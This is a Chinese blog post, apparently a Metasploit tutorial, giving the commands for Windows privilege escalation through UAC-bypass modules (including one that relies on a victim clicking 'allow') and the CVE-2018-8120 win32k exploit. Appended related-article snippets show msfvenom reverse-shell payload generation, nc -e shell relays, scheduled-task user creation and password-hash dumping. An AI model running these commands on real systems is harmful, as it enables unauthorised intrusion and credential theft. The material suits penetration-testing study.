metasploit提升权限

最新推荐文章于 2024-02-29 17:15:00 发布
最新推荐文章于 2024-02-29 17:15:00 发布
阅读量1.5w 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: Metasploit使用教程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smli_ng/article/details/106311397
本文详细介绍如何在Windows系统上使用Metasploit绕过UAC限制及利用漏洞提升权限,包括ask模块、bypassuac模块及ms18_8120模块的具体操作步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实例演示-获取system账号权限

获得system账号权限,直接获取会失败,以为win7以上版本电脑含有UAC,因此要绕过UAC。

getsystem

实例演示-绕过UAC限制

1.使用ask模块进行弹窗,受害人对电脑不了解,点击“是”,从而绕过UAC。

  • use exploit/windows/local/ask
  • set  session  1
  • run

受害者电脑会进行弹窗,点击允许,就可以提权了。

2.使用bypassuac模块,利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC标志的shell。

  • use exploit/windows/local/bypassuac
  • show options
  • set session 1
  • set  lhost  192.168.3.33
  • run

3.使用bypassuac_injection模块利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC的shell,采用反射式DLL注入技术。

  • use exploit/windows/local/bypassuac_injection
  • show options
  • set session 1
  • set  lhost  192.168.3.33

实例演示-利用漏洞提升权限

利用ms18_8120模块进行提升权限

  • use explooit/windows/local/ms18_8120_win32k_privvesc
  • set session 1
  • run

到此就完成了mesploit提权的介绍,如果想了解更多的kali工具使用,请关注我!

 

 

 

Metasploit 权限提升(炊少教学)
weiliang369的博客
02-26 648
前言   现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)   但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的gu
116.网络安全渗透测试—[权限提升篇14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2715
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
Metasploit权限提升全剧终
Fly_鹏程万里
07-06 5775
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限提升权限的方式分为两类。纵向提权:低权限角色获得高...
Metasploit拿到shell后 低权限---提权篇
qq_58000413的博客
08-24 1757
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
Metasploit -- 利用cve-2018-8120提升权限
Web安全工具库
05-09 815
其实我挺羡慕火车的,为什么?“他们连擦肩而过都那么久。。。。” ---- 网易云热评 一、生成木马 目标主机:192.168.1.129(win7 x64) 攻击机:192.168.1.33 攻击端口:12121 生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe...
使用Metasploit对Windows7进行提权
zhanqinli的博客
04-21 1197
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
Metasploit提升权限教程:KaliLinux渗透实战
提升权限是渗透测试中的关键环节,特别是在Metasploit框架中。在许多渗透攻击场景中,攻击者可能以较低权限的普通用户身份登录目标系统,这限制了其能够执行的操作。Thymeleaf中文参考文档强调了在这样的情况下,...
metasploit-framework-6.4.12.zip
最新发布
06-23
对于防御方,了解 Metasploit 的工作原理有助于提升网络安全防御能力,例如定期更新系统和软件、启用入侵检测系统、强化访问控制策略等。 总结,Metasploit Framework 6.4.12 是一款强大且灵活的渗透测试工具,...
Metasploit中利用Meterpreter进行权限提升
Metasploit简介 ## 1.1 Metasploit框架概述 Metasploit是一款开源的渗透测试框架,旨在帮助安全行业人员进行漏洞利用和渗透测试工作。它提供了一系列强大的工具和模块,可以用于发现和利用系统中的漏洞。 ...
Metasploit利用ms15-051漏洞进行权限提权
04-01 3787
Metasploit利用ms15-051漏洞进行权限提权 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
利用MSF进行windows 权限提升
gugonggugong的博客
03-18 515
前提:获取shell msf生成payload 设置监听 利用python开启http服务 win7上访问HTTP服务并执行msf.exe文件 查看监听的会话,出现meterpreter表示监听成功 一、 提高程序运行级别 查看当前用户级别 尝试getsystem直接提权,失败 ...
权限提升1(windows 手工 MSF CS)
m0_63917373的博客
03-06 346
CS MSF 权限提升
渗透测试必备工具--Metasploit(流程梳理与常用命令以及meterpreter权限分析)
Welcome To Myon'Blog !
11-10 2275
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 # 添加用户。run post/windows/gather/smart_hashdump # 从SAM导出密码哈希,execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。run post/windows/manage/enable_rdp # 开启远程桌面。ps # 查看当前活跃进程,kill 杀死进程。
metasploit进行windows提权 UAC绕过提权
Longwaer
02-02 2824
学习掌握MSF各种渗透小技巧,提升后渗透技术。
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 787
1
使用MSF进行提权(windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1425
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
CVE-2018-8120漏洞复现(提权)
qq_46258964的博客
10-14 2060
最好用的提权漏洞CVE-2018-8120 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码 影响版本 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit System
msf内网提权
dreamthe的博客
11-22 2520
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 877
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值